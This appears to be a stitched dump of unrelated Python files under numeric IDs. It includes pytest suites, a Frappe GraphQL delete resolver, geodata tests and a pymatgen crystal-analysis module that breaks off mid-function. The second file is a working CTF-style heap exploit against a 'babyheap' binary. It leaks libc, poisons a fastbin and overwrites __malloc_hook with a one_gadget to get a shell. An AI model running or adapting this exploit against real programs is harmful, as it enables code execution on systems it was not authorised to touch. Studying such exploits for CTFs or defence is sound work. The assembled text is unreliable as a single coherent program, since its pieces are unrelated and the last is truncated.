11569131
import pytest
import os


class TestChatAndStudent:
    chat_files_data_regular = [
        "chat_file_valid_english_nba_7_students.txt",
        "chat_file_valid_hebrew_7_students.txt"
    ]

    @pytest.mark.parametrize("chat_file_name", chat_files_data_regular)
    def test_create_chat_df_validation_regular(self, folders, chat_df_func, chat_file_name):
        chat_df = chat_df_func(os.path.join(folders["chat_files_folder"], chat_file_name))
        assert not chat_df.empty

    chat_files_data_empty = [
        "chat_file_empty.txt",
        "chat_file_not_structured.txt",
        "chat_file_not_structured_partially.txt",
    ]

    @pytest.mark.parametrize("chat_file_name", chat_files_data_empty)
    def test_create_chat_df_validation_empty(self, folders, chat_df_func, chat_file_name):
        with pytest.raises(ValueError):
            chat_df_func(os.path.join(folders["chat_files_folder"], chat_file_name))

    student_list_files_data = [
        "example_csv_english_nba_8_students.csv",
        "example_excel_english_nba_7_students.xlsx",
        "example_excel_hebrew_7_students.xlsx",
        "example_excel_start_in_random_row.xlsx",
        "example_mashov_file_edited_and_saved_97.xls",
        "example_mashov_file_edited_and_saved_97_with_filled_data.xls",
        "דוגמה לרשימת תלמידים.xlsx",
    ]

    @pytest.mark.parametrize("excel_file_name", student_list_files_data)
    def test_create_students_df_validation(self, folders, create_no_parse_df_students_func,
                                           excel_file_name):
        df_students = create_no_parse_df_students_func(
            os.path.join(folders["student_list_files_folder"], excel_file_name))
        assert not df_students.empty

    student_list_files_data_problems = [
        "example_mashov_file_empty.xls",
        "example_excel_too_much_records.xlsx"
    ]

    @pytest.mark.parametrize("excel_file_name", student_list_files_data_problems)
    def test_create_students_df_validation_problem(self, folders,
                                                   create_no_parse_df_students_func,
                                                   excel_file_name):
        with pytest.raises(ValueError):
            create_no_parse_df_students_func(
                os.path.join(folders["student_list_files_folder"], excel_file_name))
11569161
from PwnContext import *

if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']  # I always use tmux
    context.log_level = 'info'

    # ----- helpers for a quick script ----- #
    s = lambda data: ctx.send(str(data))  # in case data is an int
    sa = lambda delim, data: ctx.sendafter(str(delim), str(data))
    st = lambda delim, data: ctx.sendthen(str(delim), str(data))
    sl = lambda data: ctx.sendline(str(data))
    sla = lambda delim, data: ctx.sendlineafter(str(delim), str(data))
    slt = lambda delim, data: ctx.sendlinethen(str(delim), str(data))  # was a duplicate `sla`
    r = lambda numb=4096: ctx.recv(numb)
    ru = lambda delims, drop=True: ctx.recvuntil(delims, drop)
    irt = lambda: ctx.interactive()
    rs = lambda *args, **kwargs: ctx.start(*args, **kwargs)
    leak = lambda address, count=0: ctx.leak(address, count)

    def dbg(gdbscript='', *args, **kwargs):
        gdbscript = sym_ctx.gdbscript + gdbscript
        return ctx.debug(gdbscript, *args, **kwargs)

    uu32 = lambda data: u32(data.ljust(4, '\0'))
    uu64 = lambda data: u64(data.ljust(8, '\0'))

    @instruction_log()
    def alloc(size, content):
        sl(1)
        ru('size')
        sl(size)
        ru('content')
        s(content)

    @instruction_log()
    def show(ind):
        sl(2)
        ru('ind')
        sl(ind)

    @instruction_log()
    def delete(ind):
        sl(3)
        ru('ind')
        sl(ind)

    ctx.binary = change_ld('./babyheap', './ld.so')
    ctx.libc = './libc.so.6'
    ctx.io_sleep = 0.1
    sym_ctx.symbols = {'lst': 0x202020}

    rs()
    dbg('c')

    alloc(0x28, '\n')                        # 0
    alloc(0xf0, '\n')                        # 1
    alloc(0x100, '\0'*0xf0 + '\x00\x02\n')   # 2
    alloc(0x100, '\n')                       # 3
    alloc(0x28, '\n')                        # 4
    delete(1)
    delete(2)
    delete(0)
    alloc(0x28, '\0'*0x28)                   # 0 -> overflow
    alloc(0x80, '\n')                        # 1
    alloc(0x80, '\n')                        # 2
    delete(1)
    delete(3)
    alloc(0x80, '\n')                        # 1
    alloc(0x80, '\n')                        # 3
    delete(3)
    ctx.clean()
    show(2)
    ru('content: ')
    leak = uu64(ru('\n'))
    ctx.libc.address = leak - 0x3c4b78
    alloc(0x80, '\n')   # 3
    alloc(0x60, '\n')   # 2 & 5
    alloc(0x60, '\n')   # 6
    delete(2)
    delete(6)
    delete(5)
    alloc(0x60, p64(ctx.libc.sym['__malloc_hook'] - 0x1b - 8) + '\n')
    alloc(0x60, '\n')
    alloc(0x60, '\n')
    one = one_gadgets(ctx.libc, ctx.libc.address)
    alloc(0x60, '\0'*0x13 + p64(one[0]) + '\n')
    alloc(0x20, '\n')
    irt()
11569181
from graphql import GraphQLSchema, GraphQLResolveInfo

import frappe


def bind(schema: GraphQLSchema):
    schema.mutation_type.fields["deleteDoc"].resolve = delete_doc_resolver


def delete_doc_resolver(obj, info: GraphQLResolveInfo, **kwargs):
    doctype = kwargs.get("doctype")
    name = kwargs.get("name")

    doc = frappe.get_doc(doctype, name)
    doc.delete()

    return frappe._dict({
        "doctype": doctype,
        "name": name,
        "success": True
    })
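For context, a minimal sketch of how this resolver could be exercised from the client side. The SDL below is an assumption (the real schema ships with the Frappe GraphQL app), and actually running it requires a live Frappe site for frappe.get_doc to work:

# a sketch, assuming the schema defines deleteDoc(doctype, name)
from graphql import build_schema, graphql_sync

schema = build_schema("""
type DeleteDocResult { doctype: String, name: String, success: Boolean }
type Query { ping: String }
type Mutation { deleteDoc(doctype: String!, name: String!): DeleteDocResult }
""")
bind(schema)  # attach delete_doc_resolver from the module above

result = graphql_sync(schema, '''
mutation { deleteDoc(doctype: "ToDo", name: "TD-0001") { success } }
''')
print(result.data, result.errors)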
11569227
from erde.io.gpkg import driver as dr
from erde import read_df
from time import sleep
import errno
import geopandas as gpd
import os
import pytest

d = 'tests/io/data/'
points_file = d + 'blocks-points.gpkg'
match_points = d + 'match-points.gpkg'


def silentremove(filename):
    filename, *rest = filename.split(':')
    try:
        os.remove(filename)
    except OSError as e:
        if e.errno != errno.ENOENT:  # errno.ENOENT = no such file or directory
            # re-raise exception if a different error occurred
            raise


def test_read():
    for s in (True, False):
        reader = dr.read_stream(points_file, sync=s)
        for df in reader:
            assert isinstance(df, gpd.GeoDataFrame)


def test_bad_file():
    not_a_gpkg = '/tmp/not-a-gpkg.gpkg'
    for s in (True, False):
        with pytest.raises(FileNotFoundError):
            dr.read_stream('/tmp/not-a-gpkg-2.gpkg', sync=s)

        # empty file
        with open(not_a_gpkg, 'w') as f:
            f.write('')
        with pytest.raises(RuntimeError):
            dr.read_stream(not_a_gpkg, sync=s)


def test_exception_in_read():
    class TmpReader(dr.reader):
        def _read_sync(self):
            for i, df in enumerate(super()._read_sync()):
                if i == 2:
                    sleep(1)
                    raise RuntimeError('planned crash')
                yield df

    for s in (True, False):
        reader = TmpReader(points_file, sync=s, chunk_size=10)
        assert len(next(reader)) == 10
        assert len(next(reader)) == 10
        with pytest.raises(RuntimeError):
            next(reader)
        reader._handler.close()


def test_geometry_filter():
    for s in (True, False):
        filter_source = d + 'match-simple-polys.geojson'
        filter_df = read_df(filter_source)
        filter_geom = filter_df['geometry'].unary_union
        expected_names = set('ACDFGI')
        for test_filter in (filter_source, filter_df, filter_geom, None):
            stream = dr.read_stream(match_points, test_filter, chunk_size=100_000, sync=s)
            for df in stream:
                assert len(df) > 0
                if test_filter is not None:
                    # when None, the set is bigger than expected_names
                    assert set(df['name'].tolist()).issubset(expected_names)
        sleep(1)


tmp_points = '/tmp/temporary-points.gpkg'


def test_write():
    for s in (True, False):
        print(f'gpkg test write begin s={s}')
        old_df = read_df(match_points)
        if os.path.exists(tmp_points):
            os.unlink(tmp_points)
        assert not os.path.exists(tmp_points), f"could not delete file {tmp_points} before test"
        with dr.write_stream(tmp_points, sync=s) as w:
            for df in dr.read_stream(match_points, chunk_size=10):
                w(df)
        assert os.path.exists(tmp_points), f"file {tmp_points} does not exist, but should have been created"
        new_df = read_df(tmp_points)
        assert sorted(new_df['name'].tolist()) == sorted(old_df['name'].tolist())
        print(f'gpkg test write end s={s}')


def test_write_error():
    for s in (False, True):
        print(f'gpkg test write error begin s={s}')
        try:
            os.unlink(tmp_points)
        except OSError:
            pass
        with pytest.raises(RuntimeError):
            with dr.write_stream(tmp_points, sync=s) as w:
                rd = dr.read_stream(points_file, chunk_size=10, sync=s)
                for i, df in enumerate(rd):
                    if i == 2:
                        print('raising exception')
                        raise RuntimeError('planned exception')
                    print('writing')
                    w(df)
                rd._handler.close()

        # file layer does not exist
        sleep(1)
        assert not os.path.exists(tmp_points)
        if not s:  # if async, process must be ended
            assert not w.background_process.is_alive()
            sleep(1)
        print(f'gpkg test write error end s={s}')


def test_write_empty():
    import fiona
    for s, ss in {True: 'sync', False: 'async'}.items():
        ds_name = f'empty-test-{ss}'
        ds_path = f'/tmp/{ds_name}.gpkg'
        silentremove(ds_path)
        with dr.write_stream(ds_path):
            pass
        assert os.path.exists(ds_path)
        layers = fiona.listlayers(ds_path)
        assert ds_name in layers


def test_stream_guess_layer():
    from erde import read_stream
    # must find the only layer
    for df in read_stream(d + 'layer-name-different.gpkg'):
        assert len(df) > 0
    # must guess by filename
    for df in read_stream(d + 'guessable-layer.gpkg'):
        assert len(df) > 0
    # if 2 layers and none like file name, raises exception
    with pytest.raises(RuntimeError):
        read_stream(d + 'unguessable-layer.gpkg')


def test_read_stats():
    from erde import read_stream
    rd = read_stream(d + 'stats.gpkg')
    print()
    print(rd.stats())
    print(next(rd))
11569242
from inspect import getmembers, getmodule
from typing import Set, Tuple, Type

from .schemes import BaseScheme


class TouchUp:
    _registry: Set[Tuple[Type, str]] = set()

    @classmethod
    def run(cls, app):
        for target, method_name in cls._registry:
            method = getattr(target, method_name)

            if app.test_mode:
                placeholder = f"_{method_name}"
                if hasattr(target, placeholder):
                    method = getattr(target, placeholder)
                else:
                    setattr(target, placeholder, method)

            module = getmodule(target)
            module_globals = dict(getmembers(module))

            for scheme in BaseScheme._registry:
                modified = scheme(app)(method, module_globals)
                setattr(target, method_name, modified)

            target.__touched__ = True

    @classmethod
    def register(cls, target, method_name):
        cls._registry.add((target, method_name))
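A minimal sketch of the registration side, with hypothetical names: a class opts a method into touch-up at import time, and run() later rewrites that method through every registered BaseScheme (with test_mode, the original is kept on a `_`-prefixed placeholder):

class Handler:
    def dispatch(self, request):
        return request

TouchUp.register(Handler, "dispatch")

# later, during application startup; `app` is whatever object the
# schemes expect -- only app.test_mode is read by run() itself:
# TouchUp.run(app)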
11569248
from abaqus import *
from abaqusConstants import *

import config
from src.builders import MODEL_NAME, STEP_NAME
from src.builders.base_builder import BaseBuilder


class DynamicFieldOutputRequestBuilder(BaseBuilder):

    def __init__(self):
        super(DynamicFieldOutputRequestBuilder, self).__init__()
        self._required_arguments = [MODEL_NAME, STEP_NAME]

    def _build(self, **kwargs):
        output_name = 'Output_%s' % kwargs[MODEL_NAME]
        model_name = kwargs[MODEL_NAME]
        step_name = kwargs[STEP_NAME]

        mdb.models[model_name].FieldOutputRequest(
            name=output_name,
            createStepName=step_name,
            variables=('S', 'SVAVG', 'PE', 'PEVAVG', 'PEEQ', 'PEEQVAVG',
                       'LE', 'ER', 'U', 'V', 'A', 'RF', 'CSTRESS',
                       'NT', 'HFL', 'RFL', 'EVF'),
            numIntervals=config.NUM_INTERVALS
        )
11569249
class TimeZoneDBPlugin:

    def __init__(self, config):
        super(TimeZoneDBPlugin, self).__init__()
        self.config = config

    # pylint: disable=no-self-use
    def generate(self, result):
        datetime = result["datetime"]
        location = result["location"]
        return {
            "text": "It is {} in {}".format(datetime, location),
            "voice": "It is {} in {}".format(datetime, location)
        }
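A quick usage sketch; the shape of `result` follows directly from generate() above, and `config` is whatever the host assistant passes in:

plugin = TimeZoneDBPlugin(config={})
reply = plugin.generate({"datetime": "14:30", "location": "Berlin"})
print(reply["text"])  # It is 14:30 in Berlin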
11569263
chart_options = dict(
    mode="vega-lite",
    renderer="svg",
    actions={"export": True, "source": True, "editor": True},
    theme="light",
    tooltip={"theme": "light"},
)
11569274
import pytest
from cluster_toolkit import sigma_reconstruction as SR
from os.path import dirname, join
import numpy as np
import numpy.testing as npt
11569360
from __future__ import print_function, division, unicode_literals

import os
import operator

import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from math import sqrt

from scipy.spatial import Delaunay, ConvexHull

from pymatgen.core.composition import Composition
from pymatgen.core.structure import Structure
from pymatgen.core.sites import PeriodicSite
from pymatgen.core.periodic_table import Element
from pymatgen.io.vasp.outputs import Vasprun
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer

from mpinterfaces.utils import is_converged

__author__ = "<NAME>"
__copyright__ = "Copyright 2017, Henniggroup"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
__date__ = "March 3, 2017"


def sq_dist(p1, p2):
    """
    Calculate the non-square-root distance between two points.

    Args:
        p1, p2: 1x3 point coordinates.
    """
    return (p1[0]-p2[0])**2 + (p1[1]-p2[1])**2 + (p1[2]-p2[2])**2


def pt_btwn(pt1, pt2, r):
    """
    Get the vector of magnitude `r` along the path from pt1 to pt2.

    Args:
        pt1, pt2 (array): points defining the direction of the vector
            to return
        r (float): magnitude of vector to return

    Returns:
        3D vector.
    """
    total_vector = np.subtract(pt2, pt1)
    u = np.array(total_vector/np.linalg.norm(total_vector))
    return np.add(pt1, r*u)


def get_interstitial_sites(structure, octahedra=False, unique=False):
    """
    Use a Delaunay triangulation of all atomic sites in the crystal
    structure to define tetrahedra of open volumes (interstitial
    sites). Each interstitial site is ranked according to the maximum
    radius of an atom that could fit in that site without overlapping
    one of the existing neighboring atoms' radii.

    The default behavior is to stop there, but by setting `octahedra`
    to True, the tetrahedra which share faces are combined to form
    bipyramids (hexahedra) and then points are added to these
    bipyramids to form octahedra, in order to identify the largest 5-
    and 6-fold coordinated sites as well. This takes a little longer
    since it requires combining tetrahedra.

    Args:
        structure (Structure): Pymatgen Structure object
        octahedra (Boolean): Whether or not to search also for
            octahedral interstitial sites.
        unique (Boolean): Whether or not to enforce that only
            symmetrically inequivalent sites are returned.
            Determining the symmetry-equivalence is usually by far
            the slowest task in the algorithm.

    Returns:
        interstitials (dict): dictionary of the form
            {"tetrahedral": [(coordinates, max_radius), ...],
             "hexahedral": [(coordinates, max_radius), ...],
             "octahedral": [(coordinates, max_radius), ...]}
            storing lists of each interstitial site for both
            coordination types, sorted by largest radius first.
            Coordinates are given as cartesian.
    """

    # Preserve the original structure
    st = structure.copy()
    # Small unit cells make the triangulation unreliable
    n_sites = structure.num_sites
    if n_sites < 4:
        st.make_supercell(3)
    m_0 = st.lattice._matrix

    # Make a 3x3x3 supercell so that the center unit cell
    # is surrounded by its images- i.e. it has no "boundaries",
    # which can erroneously create tetrahedra of infinite volumes.
    st.make_supercell(3)
    m = st.lattice._matrix

    # These are the vertices of only the center cell
    cell_vertices = np.array([
        np.add(np.add(m[0]/3., m[1]/3.), m[2]/3.),
        np.add(np.add(m[0]/1.5, m[1]/3.), m[2]/3.),
        np.add(np.add(m[0]/3., m[1]/1.5), m[2]/3.),
        np.add(np.add(m[0]/1.5, m[1]/1.5), m[2]/3.),
        np.add(np.add(m[0]/3., m[1]/3.), m[2]/1.5),
        np.add(np.add(m[0]/1.5, m[1]/3.), m[2]/1.5),
        np.add(np.add(m[0]/3., m[1]/1.5), m[2]/1.5),
        np.add(np.add(m[0]/1.5, m[1]/1.5), m[2]/1.5)
    ])
    cell_center = np.mean(cell_vertices, axis=0)

    other_cell_centers = []
    for i in range(-1, 2):
        for j in range(-1, 2):
            for k in range(-1, 2):
                c = np.add(cell_center, np.multiply(i, m_0[0]))
                c = np.add(c, np.multiply(j, m_0[1]))
                c = np.add(c, np.multiply(k, m_0[2]))
                other_cell_centers.append(c)

    max_distance_in_cell = sq_dist(cell_vertices[0], cell_center)

    points = [s.coords for s in st.sites]
    radii = [float(s.specie.atomic_radius) for s in st.sites]

    # Create the initial Delaunay triangulation of all sites in the
    # supercell.
    delaunay = Delaunay(points)
    all_simplices = delaunay.simplices.copy()

    # Now filter those Delaunay simplices to only those with
    # at least one vertex lying within the center unit cell.
    simplices = []
    center_cell = ConvexHull(cell_vertices)

    if not octahedra:
        for simplex in all_simplices:
            for vertex in simplex:
                if sq_dist(cell_center, points[vertex]) <= max_distance_in_cell \
                        and sq_dist(cell_center, points[vertex]) == \
                        min([sq_dist(points[vertex], pt) for pt in other_cell_centers]):
                    simplices.append(simplex)
                    break
    else:
        for simplex in all_simplices:
            n = 0
            for vertex in simplex:
                if sq_dist(cell_center, points[vertex]) <= max_distance_in_cell \
                        and sq_dist(cell_center, points[vertex]) == \
                        min([sq_dist(points[vertex], pt) for pt in other_cell_centers]):
                    n += 1
            if n == 4:
                simplices.append(simplex)

    # Calculate the maximum interstitial
    # radius for all the relevant tetrahedra.
    tetrahedra = []
    for simplex in simplices:
        a = points[simplex[0]]
        r_a = radii[simplex[0]]
        b = points[simplex[1]]
        r_b = radii[simplex[1]]
        c = points[simplex[2]]
        r_c = radii[simplex[2]]
        d = points[simplex[3]]
        r_d = radii[simplex[3]]
        centroid = np.mean([a, b, c, d], axis=0)

        # Add the atomic radii to the nuclei locations to find
        # their "true" extrema, then use these to find the
        # "true" centroid.
        move = 1
        while move > 0.01:
            true_a = pt_btwn(a, centroid, r_a)
            true_b = pt_btwn(b, centroid, r_b)
            true_c = pt_btwn(c, centroid, r_c)
            true_d = pt_btwn(d, centroid, r_d)
            true_centroid = np.mean(
                [true_a, true_b, true_c, true_d], axis=0
            )
            move = sq_dist(true_centroid, centroid)
            centroid = true_centroid

        max_radius = sqrt(min(
            [sq_dist(true_centroid, pt) for pt in
             [true_a, true_b, true_c, true_d]]
        ))

        tetrahedra.append(
            (true_centroid,
             [tuple(x) for x in [a, b, c, d]],
             [r_a, r_b, r_c, r_d],
             4,
             max_radius)
        )

    interstitials = {"tetrahedral": []}
    if octahedra:
        tet_pts = [i[1] for i in tetrahedra]
        tet_pts = list(set([coords for pt in tet_pts for coords in pt]))
        interstitials.update({"hexahedral": [], "octahedral": []})
        for i in range(len(tetrahedra)):
            for j in range(i, len(tetrahedra)):
                # If 3 vertices are shared then the tetrahedra
                # share a face and form a bipyramid.
                shared = list(set(tetrahedra[i][1]) & set(tetrahedra[j][1]))
                if len(shared) == 3:
                    # Vertices of the bipyramid
                    a = tetrahedra[i][1][0]
                    r_a = tetrahedra[i][2][0]
                    b = tetrahedra[i][1][1]
                    r_b = tetrahedra[i][2][1]
                    c = tetrahedra[i][1][2]
                    r_c = tetrahedra[i][2][2]
                    d = tetrahedra[i][1][3]
                    r_d = tetrahedra[i][2][3]
                    # Fifth point to define trigonal bipyramid
                    e, r_e = [
                        (s, tetrahedra[j][2][k]) for k, s in
                        enumerate(tetrahedra[j][1]) if s not in tetrahedra[i][1]
                    ][0]
                    h_centroid = np.mean([a, b, c, d, e], axis=0)

                    move = 1
                    while move > 0.01:
                        true_a = pt_btwn(a, h_centroid, r_a)
                        true_b = pt_btwn(b, h_centroid, r_b)
                        true_c = pt_btwn(c, h_centroid, r_c)
                        true_d = pt_btwn(d, h_centroid, r_d)
                        true_e = pt_btwn(e, h_centroid, r_e)
                        true_h_centroid = np.mean(
                            [true_a, true_b, true_c, true_d, true_e], axis=0
                        )
                        move = sq_dist(true_h_centroid, h_centroid)
                        h_centroid = true_h_centroid

                    r_h = sqrt(min(
                        [sq_dist(true_h_centroid, pt) for pt in
                         [true_a, true_b, true_c, true_d, true_e]]
                    ))

                    # Add the bipyramid to the final list
                    # of interstitials.
                    interstitials["hexahedral"].append(
                        (tuple(h_centroid), r_h)
                    )

                    # Enlarge the bipyramid by one point to create
                    # octahedra.
                    v1 = np.subtract(shared[0], shared[1])
                    v2 = np.subtract(shared[0], shared[2])
                    tol = max([sq_dist(shared[0], shared[1]),
                               sq_dist(shared[0], shared[2]),
                               sq_dist(shared[1], shared[2])]) * 1.1
                    for index, f in enumerate(tet_pts):
                        v3 = np.subtract(shared[0], f)
                        distances = [sq_dist(f, p) for p in shared]
                        distances.sort()
                        if 0 < distances[0] < tol and 0 < distances[1] < tol \
                                and np.dot(v3, (np.cross(v1, v2))) == 0:
                            r_f = radii[index]
                            o_centroid = np.mean([a, b, c, d, e, f], axis=0)

                            move = 1
                            while move > 0.01:
                                true_a = pt_btwn(a, o_centroid, r_a)
                                true_b = pt_btwn(b, o_centroid, r_b)
                                true_c = pt_btwn(c, o_centroid, r_c)
                                true_d = pt_btwn(d, o_centroid, r_d)
                                true_e = pt_btwn(e, o_centroid, r_e)
                                true_f = pt_btwn(f, o_centroid, r_f)
                                true_o_centroid = np.mean(
                                    [true_a, true_b, true_c, true_d, true_e, true_f],
                                    axis=0
                                )
                                move = sq_dist(true_o_centroid, o_centroid)
                                o_centroid = true_o_centroid

                            r_o = sqrt(min(
                                [sq_dist(true_o_centroid, pt) for pt in
                                 [true_a, true_b, true_c, true_d, true_e, true_f]]
                            ))

                            # Add the octahedron to the final
                            # list of interstitials.
                            interstitials["octahedral"].append(
                                (tuple(o_centroid), r_o)
                            )

        interstitials["hexahedral"] = list(set(interstitials["hexahedral"]))
        interstitials["octahedral"] = list(set(interstitials["octahedral"]))

    interstitials["tetrahedral"] = [(i[0], i[4]) for i in tetrahedra]

    # Since the centroid coordinates were given in the center
    # cell of the supercell, bring them back into the original
    # unit cell.
    if n_sites < 4:
        f = 1./3.
    else:
        f = 1.
    for c in interstitials:
        for i in range(len(interstitials[c])):
            for r in m_0:
                interstitials[c][i] = (
                    np.multiply(
                        np.subtract(np.array(interstitials[c][i][0]), r), f
                    ),
                    interstitials[c][i][1]
                )

    # Sort by the maximum radii
    for c in interstitials:
        interstitials[c].sort(key=operator.itemgetter(1))
        interstitials[c].reverse()

    if unique:
        sga = SpacegroupAnalyzer(structure)
        sop = sga.get_space_group_operations()
        l = structure.lattice
        for c in interstitials:
            remove = []
            for i in range(len(interstitials[c])):
                if i not in remove:
                    site_i = PeriodicSite("C", interstitials[c][i][0], l)
                    for j in range(i+1, len(interstitials[c])):
                        if interstitials[c][i][1] == interstitials[c][j][1] and \
                                sop.are_symmetrically_equivalent(
                                    [site_i],
                                    [PeriodicSite("C", interstitials[c][j][0], l)]
                                ):
                            remove.append(j)
            interstitials[c] = [interstitials[c][x] for x in
                                range(len(interstitials[c])) if x not in remove]

    return interstitials


def get_coordination_polyhedra(structure, cation, anion="O"):
    r_c, r_a = Element(cation).atomic_radius, Element(anion).atomic_radius
    st = structure.copy()
    cations = [s for s in st.sites if s.specie.symbol == cation]

    uc_tetrahedra, uc_octahedra = [], []
    for s in cations:
        anion_shell = [a[0] for a in st.get_neighbors(s, (r_c+r_a)*1.1)]
        if len(anion_shell) == 4:
            uc_tetrahedra.append(
                [tuple([round(c, 3) for c in a.coords]) for a in anion_shell])
        elif len(anion_shell) == 6:
            uc_octahedra.append(
                [tuple([round(c, 3) for c in a.coords]) for a in anion_shell])

    st.make_supercell(2)
    cations = [s for s in st.sites if s.specie.symbol == cation]

    tetrahedra, octahedra = [], []
    for s in cations:
        anion_shell = [a[0] for a in st.get_neighbors(s, (r_c+r_a)*1.1)]
        if len(anion_shell) == 4:
            tetrahedra.append(
                [tuple([round(c, 3) for c in a.coords]) for a in anion_shell])
        elif len(anion_shell) == 6:
            octahedra.append(
                [tuple([round(c, 3) for c in a.coords]) for a in anion_shell])

    t_corner, t_edge, t_face = [], [], []
    o_corner, o_edge, o_face = [], [], []

    if len(tetrahedra) != 0:
        for i in range(len(tetrahedra)):
            t1 = tetrahedra[i]
            for j in range(i+1, len(tetrahedra)):
                t2 = tetrahedra[j]
                shared = list(set(t1) & set(t2))
                if len(shared) == 1:
                    # Corner sharing
                    if t1 in uc_tetrahedra and t1 not in t_corner:
                        t_corner.append(t1)
                    if t2 in uc_tetrahedra and t2 not in t_corner:
                        t_corner.append(t2)
                elif len(shared) == 2:
                    # Edge sharing
                    if t1 in uc_tetrahedra and t1 not in t_edge:
                        t_edge.append(t1)
                    if t2 in uc_tetrahedra and t2 not in t_edge:
                        t_edge.append(t2)
                elif len(shared) == 3:
                    # Face sharing
                    if t1 in uc_tetrahedra and t1 not in t_face:
                        t_face.append(t1)
                    if t2 in uc_tetrahedra and t2 not in t_face:
                        t_face.append(t2)

    if len(octahedra) != 0:
        for i in range(len(octahedra)):
            o1 = octahedra[i]
            for j in range(i+1, len(octahedra)):
                o2 = octahedra[j]
                shared = list(set(o1) & set(o2))
                if len(shared) == 1:
                    # Corner sharing
                    if o1 in uc_octahedra and o1 not in o_corner:
                        o_corner.append(o1)
                    if o2 in uc_octahedra and o2 not in o_corner:
                        o_corner.append(o2)
                elif len(shared) == 2:
                    # Edge sharing
                    if o1 in uc_octahedra and o1 not in o_edge:
                        o_edge.append(o1)
                    if o2 in uc_octahedra and o2 not in o_edge:
                        o_edge.append(o2)
                elif len(shared) == 3:
                    # Face sharing
                    if o1 in uc_octahedra and o1 not in o_face:
                        o_face.append(o1)
                    if o2 in uc_octahedra and o2 not in o_face:
                        o_face.append(o2)

    # Note: the original mapped "corner" to t_edge and "edge" to
    # t_corner (likewise for octahedra), contradicting the variable
    # names; the mapping is corrected here.
    polyhedra = {
        "tetrahedra": {"corner": t_corner, "edge": t_edge, "face": t_face},
        "octahedra": {"corner": o_corner, "edge": o_edge, "face": o_face}
    }

    return polyhedra


def plot_ion_hull_and_voltages(ion, charge=None, fmt='pdf'):
    """
    Plots the phase diagram between the pure
    material and pure ion, connecting the points on the convex hull
    of the phase diagram.

    Args:
        ion (str): name of atom that was intercalated, e.g. 'Li'.
        charge (float): charge donated by each ion.
        fmt (str): matplotlib format style. Check the matplotlib
            docs for options.

    Returns:
        capacity (float): Maximum capacity
    """

    # Calculated with the relax() function in
    # mat2d.stability.startup. If you are using other input
    # parameters, you need to recalculate these values!
    ion_ev_fu = {'Li': -1.838, 'Mg': 0.620, 'Al': -3.291}

    if charge is None:
        charge = Element(ion).common_oxidation_states[0]

    energy = Vasprun('vasprun.xml').final_energy
    composition = Structure.from_file('POSCAR').composition

    # Get the formula (with single-digit integers preceded by a '_').
    twod_material = list(composition.reduced_formula)
    twod_formula = str()
    for i in range(len(twod_material)):
        try:
            int(twod_material[i])
            twod_formula += '_{}'.format(twod_material[i])
        except ValueError:
            twod_formula += twod_material[i]

    twod_ev_fu = energy / composition.get_reduced_composition_and_factor()[1]

    data = [(0, 0, 0, twod_ev_fu)]  # (at% ion, n_ions, E_F, abs_energy)
    dirs = [dir for dir in os.listdir(os.getcwd()) if os.path.isdir(dir)]
    for directory in dirs:
        if is_converged(directory):
            os.chdir(directory)
            energy = Vasprun('vasprun.xml').final_energy
            composition = Structure.from_file('POSCAR').composition
            ion_fraction = composition.get_atomic_fraction(ion)

            no_ion_comp_dict = composition.as_dict()
            no_ion_comp_dict.update({ion: 0})
            no_ion_comp = Composition.from_dict(no_ion_comp_dict)

            n_twod_fu = no_ion_comp.get_reduced_composition_and_factor()[1]
            n_ions = composition[ion] / n_twod_fu

            E_F = ((energy - composition[ion] * ion_ev_fu[ion]
                    - twod_ev_fu * n_twod_fu)
                   / composition.num_atoms)

            data.append((ion_fraction, n_ions, E_F, energy / n_twod_fu))
            os.chdir('../')
    data.append((1, 1, 0, ion_ev_fu[ion]))  # Pure ion

    sorted_data = sorted(data, key=operator.itemgetter(0))

    # Determine which compositions are on the convex hull.
    energy_profile = np.array([[item[0], item[2]] for item in sorted_data
                               if item[2] <= 0])
    hull = ConvexHull(energy_profile)
    convex_ion_fractions = [energy_profile[vertex, 0] for vertex in hull.vertices]
    convex_formation_energies = [energy_profile[vertex, 1] for vertex in hull.vertices]

    convex_ion_fractions.append(convex_ion_fractions.pop(0))
    convex_formation_energies.append(convex_formation_energies.pop(0))

    concave_ion_fractions = [pt[0] for pt in sorted_data
                             if pt[0] not in convex_ion_fractions]
    concave_formation_energies = [pt[2] for pt in sorted_data
                                  if pt[0] not in convex_ion_fractions]

    for item in data:
        if item[0] == sorted(convex_ion_fractions)[-2]:
            max_ions = item[1]

    molar_mass = Composition(no_ion_comp.reduced_formula).weight
    faraday = 26801  # In mAh/mol
    capacity = (max_ions * charge * faraday) / molar_mass  # In mAh/g

    voltage_profile = []
    j = 0
    k = 0
    for i in range(1, len(sorted_data) - 1):
        if sorted_data[i][0] in convex_ion_fractions:
            voltage = -(
                ((sorted_data[i][3] - sorted_data[k][3])
                 - (sorted_data[i][1] - sorted_data[k][1]) * ion_ev_fu[ion])
                / (sorted_data[i][1] - sorted_data[k][1])
            )
            voltage_profile.append((sorted_data[k][0], voltage))
            voltage_profile.append((sorted_data[i][0], voltage))
            j += 1
            k = i

    voltage_profile.append((voltage_profile[-1][0], 0))
    voltage_profile.append((1, 0))

    voltage_profile_x = [tup[0] for tup in voltage_profile]
    voltage_profile_y = [tup[1] for tup in voltage_profile]

    ax = plt.figure(figsize=(14, 10)).gca()
    ax.plot([0, 1], [0, 0], 'k--')
    ax.plot(convex_ion_fractions, convex_formation_energies, 'b-', marker='o',
            markersize=12, markeredgecolor='none')
    ax.plot(concave_ion_fractions, concave_formation_energies, 'r', marker='o',
            linewidth=0, markersize=12, markeredgecolor='none')

    ax2 = ax.twinx()
    ax2.plot(voltage_profile_x, voltage_profile_y, 'k-', marker='o')

    ax.text(0, 0.002, r'$\mathrm{%s}$' % twod_formula, family='serif', size=24)
    ax.text(0.99, 0.002, r'$\mathrm{%s}$' % ion, family='serif', size=24,
            horizontalalignment='right')

    ax.set_xticklabels(ax.get_xticks(), family='serif', size=20)
    ax.set_yticklabels(ax.get_yticks(), family='serif', size=20)
    ax2.set_yticklabels(ax2.get_yticks(), family='serif', size=20)

    ax.set_xlabel('at% {}'.format(ion), family='serif', size=28)
    ax.set_ylabel(r'$\mathrm{E_F\/(eV/atom)}$', size=28)

    ax2.yaxis.set_label_position('right')
    if ion == 'Li':
        ax2.set_ylabel(r'$\mathrm{Potential\/vs.\/Li/Li^+\/(V)}$', size=28)
